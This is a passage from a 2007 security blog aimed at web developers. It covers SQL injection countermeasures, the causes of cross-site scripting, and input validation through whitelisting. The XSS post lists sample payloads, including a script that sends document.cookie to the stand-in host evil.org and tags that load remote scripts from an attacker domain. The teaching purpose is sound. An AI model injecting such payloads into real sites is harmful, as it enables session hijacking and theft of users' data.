Can stop or disable required services or can even shut down the server.

Recommendations:

Avoid usage of dynamic SQL; consider using parameters passed to stored procedures instead of dynamic SQL. Parameters passed to a stored procedure are generally much safer than using dynamic SQL.
Perform Input Validation on all inputs constraining the input in terms of length, character set, and format, so that application accepts only valid characters. Please refer to my post Assume all input is malicious until proven otherwise on input validation for more details.
Do not rely on client-side code to validate input, as it can be bypassed by attackers.
Use a white list approach to validate the inputs.
Along with input validation consider sanitizing the input that they do not contain dangerous codes as a defense in depth strategy.
Limit database permissions and segregate users.
Lockdown the server: Run Database server service on a least privileged account and use least privileged account to connect to the database from the application.
Isolate the web server.
Display only generic error messages to the users of the application, implement proper error handling and fail safely in case of any failure.

The above are the few methods to protect applications from SQL injections. Implement all or combination of few to defense against SQL injection but don’t depend only inadequate techniques like sanitizing/escaping few characters like single quotes these can be easily bypassed by the attackers like by using Char function to overcome the single code escape (Char(0x63)).
It is better to implement at least parameterized stored procedures instead of dynamic SQL along with the adequate input validation like regular expressions with a white list approach to validate input at server side to prevent SQL injections.

Conclusion:

I believe that web application developers often simply do not think about "surprise and malicious inputs", they generally focus only on application functionality rather than security, but attackers and security people do, so it is always a good practice to implement security best practices while developing and designing the applications to develop robust and secure applications.

Tuesday, September 18, 2007

The Cause of Cross-Site Scripting

Cross-Site Scripting:

Cross-site script (also known as XSS or CSS) vulnerabilities occur whenever one user input is passed back to the browser without adequate validation, sanitization or encoding. Simply XSS occurs when dynamically generated web pages display user input that is not properly validated, enabling an attacker to inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable page and execute the script on the machine of any user that views that site in order to gather data from them. In general, XSS exploits enable attackers to take arbitrary actions on the vulnerable site on the victim's behalf. In the worst-case scenario, an attacker can use XSS to seize remote control of the victim's computer.

An attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Users may unintentionally execute scripts written by an attacker when they follow links in unknown sources, either in web pages, instant messages, e-mail messages, newsgroup postings, etc., The end user’s browser has no way to know that the script should not be trusted, and will execute the script as thinking it came from a trusted source.

The malicious script can access any cookies, session tokens, or other sensitive information retained by end user’s browser and used with that site. These scripts can even rewrite the content of the HTML page. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible with XSS. Because the malicious scripts use the targeted site to hide their origins, the attacker has full access to the retrieved web page and may send data contained in the page back to their own server. Scripting tags that are most often used to embed malicious content include <script>, <object>, <applet>, <form> and <embed>. However, it is important to note that alternative “in-line” scripting elements may be used and interpreted by the current generation of web browsers, such as javascript:alert('Oops Hacked').

Attackers frequently use a variety of methods to encode the malicious portion of the tag to bypass filters and validation techniques that use a black list approach. There are hundreds of variants of these attacks, including versions that do not even require any < > symbols for example If a web page uses the UFT-7 character encoding, there are several different strings which will act as a ‘<’ character and start an HTML tag; So, don’t depend on black list approach to validate the user input or don’t depend only on escaping/filtering/encoding few malicious characters.

XSS attacks can generally be categorized into two categories:

Persistent/Direct attacks: In this the injected code is permanently stored on the target servers, such as in a database. The victim then retrieves the malicious script from the server when it requests the stored information.
Non-Persistent/Indirect attacks: In this the injected code is reflected off the web server, such as any response that includes some or all of the input sent to the server as part of the request. The attacker supplies the victim with a URL or HTML form which contains malicious script. The victim's browser passes the malicious script to the vulnerable site, which replays it to the victim's browser.
In both cases, the script is executed in the trust context of the vulnerable site.

For example:

A vulnerable site is having a search page accepts requests and then displays the results of the search criteria the user entered. If a user typed “abcdefghxyz” as the search criteria, the server may return that the input is invalid or No value is found for abcdefghxyz. This may seem good and harmless in this case. But suppose the user types in "<Script>alert('Oops Hacked');</Script>” and server returns “No value is found for <Script>alert('Oops Hacked');</Script> to the browser.” Here, if the user input is not encoded or validated then the client’s web browser will interpret the script tags and execute the alert (‘Oops Hacked’) function resulting a message box with “Oops Hacked” message. If so, this page is probably susceptible to a XSS attack. This is a common method attackers use to find vulnerable sites.

Typical Payloads:

<img src = "malicious.js">
<Script>alert('hacked')</script>
<iframe = "malicious.js"> ... </iframe>
<Script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>
<a href="javascript:…"> click-me </a>
<EMBED SRC="http://www.xsshacker.com/movies/porn.mov">
<A HREF="http://Originalsite.com/search.asp?criteria=<SCRIPT SRC= 'http://xsshackers.com/badscript.js'> </SCRIPT>"> Home </A>
<A HREF="" [event]='code'">Go</A>
<img src="&{alert('Oops Hacked')};">
http://Originalsite.com/search.asp?query=%26%7balert%28%27OopsHacked %27%29%7d%3b
<EMBED src="http://xsshackers.com/maliciousflash.swf" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100" height="100"> </EMBED>

Prevention:

The ideal defense against cross-site script employs a combination of input validation and output encoding. Use regular expressions to validate the input using a white list approach to allow only acceptable character set, type, format and length. Use proper encoding before echoing the user input back to the browser. Output encoding is only useful for defeating XSS attacks, whereas input validation can defeat many other attacks. Therefore, take advantage of both techniques, following the principle of defensive design.

Microsoft released a free library called the AntiXss Library that makes output encoding more secure and supports more output contexts than just HTML. So, instead of using weak encoding methods use this library to protect your application from XSS. You can download AntiXss library from the below site:

http://www.microsoft.com/downloads/details.aspx?familyid=9a2b9c92-7ad9-496c-9a89-af08de2e5982&displaylang=en.

Monday, September 17, 2007

Assume all input is malicious until proven otherwise

Input validation:

Input validation is the most important ingredient of a secure application. Most major security holes today result from input validation flaws. This is something you can fix only by writing secure code; no settings or firewalls can save you here.

Your application’s user input is the attacker’s primary weapon when targeting your application. Various attacks like Buffer overflow; cross-site scripting; SQL injection; canonicalization; code injection; and numerous other denial of service and elevation of privilege attacks can exploit poor input validation. For example Non-validated input in the Hypertext Markup Language (HTML) output stream leads to cross-site scripting, Non-validated input used to generate SQL queries leads to SQL injection, and Use of input file names, URLs, or user names for security decisions leads to canonicalization attack.

Input is anything that isn’t well known at compile time. Web applications receive input from various sources, for example, all data sent from the user or that is round-tripped by your application (post back data, view State, cookies, headers, query string parameters, and so forth) and back-end data (databases, configuration data, and other data sources). All that input data influences your request processing at some point.

If you make unfounded assumptions about the type, length, format, or range of input, your application is unlikely to be secure. The attacker can supply carefully crafted input that compromises your application.

Assume all input is malicious until proven otherwise, and apply a defense in depth strategy to input validation, taking particular precautions to make sure that input is validated whenever a trust boundary in your application is crossed. Your applications must ensure that input from query strings, form fields, and cookies are valid for the application. Consider all user input as possibly malicious, and sanitize for the context of the downstream code. Validate all input for known valid values and then reject all other input. Use regular expressions to validate input data.

You should also validate the data coming from the database as treating it as one form of the user input, especially if other applications write to the database. But, Input validation is not always necessary if the input is passed from a trusted source inside your trust boundary, but it should be considered mandatory if the input is passed from sources that are not trusted.

Proper input validation is one of your strongest measures of defense against today’s application attacks. Consider the following guidelines for input validation.

Assume all input is malicious: Input validation starts with a fundamental supposition that all input is malicious until proven otherwise. Whether input comes from a service, a file share, a user, or a database, validate your input if the source is outside your trust boundary.
Centralize your approach: Make your input validation strategy a core element of your application design. Consider a centralized approach to validation.
Do not rely on client-side validation: Server-side code should perform its own validation. Client side validations can be easily bypassed. For example you used java script to validate the value entered by the user can be easily by passed by disabling script in the browser.
Be careful with canonicalization issues: Data in canonical form is in its most standard or simplest form. Canonicalization is the process of converting data to its canonical form.
Constrain, reject, and sanitize your input: The preferred approach to validating input is to constrain what you allow from the beginning. Validate all input for known valid values and then reject all other input. Best way is to use regular expressions to validate input data.
Other Countermeasures (Defense in Depth approach):
In addition to the techniques discussed earlier, use other countermeasures for defense in depth like set the correct character encoding, use the ASP.NET version 1.1 validateRequest option, Install URLScan on your Web server etc.

Input Validation Techniques:

You can use a variety number of input validation techniques to validate the data. But, most of all can be categorized into either white listing approach or black listing approach. Some of the validation techniques are described below.

Black Listing: Developers feel black listing approach is an easiest approach for input validation but indeed it is very hard to black listing, you cannot predict what unexpected input might prove dangerous as new exploits are developed. How can you determine the all malicious characters? For example to overcome Cross site scripting attack you may black list ‘<’, ‘>’ and few more special characters but these characters can be represented in many ways. So, this approach is always the most unreliable. You can use this technique along with the other validation techniques for defense in depth purpose, but don’t rely only on this technique to validate the input. The above mentioned ASP.NET version 1.1 “validateRequest” feature uses this technique.
White Listing: Well, this is the preferred technique for input validation. White listing is defining a set of allowed characters and rejecting anything outside this set. This is exactly the opposite of black listing and is much more powerful because it allows only reliable characters, and it is easier to implement.
Data Type Conversion: It is always recommended to validate the data for type, format, range, and length. The simple fundamental input data checks you can do is to make sure that data is of the correct data type you are expecting. Every data type in .NET has a method called Parse/TryParse that allows you to create the corresponding data type from a string.
Regular Expressions: Wow, here is the right choice for you to validate the data for format, type, range, and length all with a single shot; this is incredibly powerful way to implement white listing and pattern matching of strings. .NET Framework providing System.Text.RegularExpression namespace for this purpose.
XML Validation: Validation of XML data against schema is another white-listing technique. You should know what to allow and expect, XML Schema is an powerful way to make sure XML documents are comply to a certain format. .NET Framework providing System.Xml namespace for this purpose.
Along with the above few more techniques are there like sand boxing, integrity checking with hashing, etc.

Summary:

While developing applications always remember that the majority of application level attacks approx 80% rely on maliciously formed input data and poor application input validation. Most Web application attacks require that malicious input is passed within HTTP requests. The general goal is either to coerce the application into performing unauthorized operations or to disrupt its normal operation. This is why thorough input validation is an essential countermeasure to many attacks and should be made a top priority when you develop Web pages. Take special care in this area to make sure that your validation strategy is sound and that all data that is processed from a non-trusted source is properly validated.

References:

There are several validation routines freely available at:

http://www.guidancelibrary.com/default.aspx/Home.RegExInputValCode

How To: Use Regular Expressions to Constrain Input in ASP.NET

http://msdn2.microsoft.com/en-us/library/ms998267.aspx

Security Guidelines: ASP.NET 2.0

http://msdn2.microsoft.com/en-us/library/ms998258.aspx

Gopal's Blog

Tuesday, December 11, 2007

Customize your Find in Files Results in Visual Studio

Thursday, November 1, 2007

An Overview of Cryptography

Saturday, October 20, 2007

An Overview Of Buffer Overflows / Buffer Overruns

Wednesday, October 17, 2007

One Of The Code Injection Attack: LDAP Injection

Wednesday, October 10, 2007

Code Injection: XPath Injection

Friday, September 21, 2007

An Over View Of SQL Inection

Tuesday, September 18, 2007

The Cause of Cross-Site Scripting

Monday, September 17, 2007

Assume all input is malicious until proven otherwise

Gopal Rao Joginipally

My Blog Archive

Other Links:

Security Related Links:

Topics Posted

Useful References

Tuesday, December 11, 2007

Thursday, November 1, 2007

Saturday, October 20, 2007

Wednesday, October 17, 2007

Wednesday, October 10, 2007

Friday, September 21, 2007

Tuesday, September 18, 2007

Monday, September 17, 2007

Gopal Rao Joginipally

Other Links:

Security Related Links:

Topics Posted

Subscribe To

Useful References